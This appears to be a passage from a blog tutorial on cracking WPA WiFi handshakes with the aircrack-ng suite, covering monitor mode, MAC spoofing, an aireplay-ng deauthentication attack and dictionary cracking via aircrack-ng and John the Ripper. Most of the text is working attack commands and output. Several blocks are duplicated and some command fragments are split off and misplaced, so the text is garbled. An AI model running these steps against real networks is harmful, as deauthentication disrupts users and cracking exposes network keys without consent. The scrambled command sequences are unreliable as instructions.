ath9k module.Firstly we need to stop all services that may interfere with the wireless interface - we can let airmon tell us what it thinks might be troublesome and then stop these. Letting airmon stop them (via
airmon-ng kill) does not prevent other tools/monitors from restarting these processes. To start, disconnect from all wireless networks.$ airmon-ng check
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
769 NetworkManager
779 avahi-daemon
785 avahi-daemon
891 wpa_supplicant
$ service avahi-daemon stop
$ service NetworkManager stop
$ service wpa_supplicant stop
Verify that the interface is down (there's no 'UP' flag)Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
769 NetworkManager
779 avahi-daemon
785 avahi-daemon
891 wpa_supplicant
$ service avahi-daemon stop
$ service NetworkManager stop
$ service wpa_supplicant stop
$ ifconfig wlo1 down && ifconfig -a
...
wlo1: flags=802 mtu 1500
At this point the wireless card is down and disconnected and we will need to put the card into monitor mode. To manually do this: ...
wlo1: flags=802
$ iwconfig wlo1 mode monitor will leave you the same interface in the desired mode. To let airmon-ng handle this: $ airmon-ng start wlo1
PHY Interface Driver Chipset
phy0 wlo1 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlo1 on [phy0]wlo1mon)
(mac80211 station mode vif disabled for [phy0]wlo1)
# verify monitor mode and also the interface name change
$ iwconfig
...
wlo1mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=15 dBm
$ ifconfig -a
...
wlo1mon: flags=4163 mtu 1500
$ ifconfig wlo1mon down
$ macchanger -r wlo1mon
$ ifconfig wlo1mon up
At this stage we can use this newly created logical PHY Interface Driver Chipset
phy0 wlo1 ath9k Qualcomm Atheros AR9285 Wireless Network Adapter (PCI-Express) (rev 01)
(mac80211 monitor mode vif enabled for [phy0]wlo1 on [phy0]wlo1mon)
(mac80211 station mode vif disabled for [phy0]wlo1)
# verify monitor mode and also the interface name change
$ iwconfig
...
wlo1mon IEEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=15 dBm
$ ifconfig -a
...
wlo1mon: flags=4163
$ ifconfig wlo1mon down
$ macchanger -r wlo1mon
$ ifconfig wlo1mon up
wlo1mon interface# see what is around, only connected clients
$ airodump-ng -a wlo1mon
# see only on specific bssid/essid on given channel as found from above
# writing out the capture details in /tmp/wifi.cap
$ airodump-ng -d bssid
# deauth
$ aireplay-ng --deauth 1 -a bssid
For long running/resumable penetration testing, John The Ripper can be used in conjunction with $ airodump-ng -a wlo1mon
# see only on specific bssid/essid on given channel as found from above
# writing out the capture details in /tmp/wifi.cap
$ airodump-ng -d bssid
-c channel wlo1mon -w /tmp/wifi# deauth
$ aireplay-ng --deauth 1 -a bssid
-c client mac
# attempt to pen-test the handshake (if logged) using the dictionary file -w
# if the capture file contains more than one bssid, use -b to specify for non
# interactive use
$ aircrack-ng /tmp/wifi.cap -w /usr/share/dict/darkc0de
aircrack-ng.# setup john the ripper help pentest but using session
$ john --session=foo --stdout --wordlist=/usr/share/dict/darkc0de | \
aircrack-ng -w - \
-b 00:11:22:33:44:55 /tmp/wifi.cap
# use 'q' or Ctrl-C to pause cracking
# restart cracking
$ john --restore=foo | \
aircrack-ng -w - \
-b 00:11:22:33:44:55 /tmp/wifi.cap
$ john --session=foo --stdout --wordlist=/usr/share/dict/darkc0de | \
aircrack-ng -w - \
-b 00:11:22:33:44:55 /tmp/wifi.cap
# use 'q' or Ctrl-C to pause cracking
# restart cracking
$ john --restore=foo | \
aircrack-ng -w - \
-b 00:11:22:33:44:55 /tmp/wifi.cap
To clean up the logical interfaces created and return the wireless interface for normal use:
$ airmon-ng stop wlo1
$ for i in wpa_supplicant avahi-daemon NetworkManager; do service $i start ; done
At this point bring back the connection in the NetworkManager and go about your day.
$ for i in wpa_supplicant avahi-daemon NetworkManager; do service $i start ; done
No comments:
Post a Comment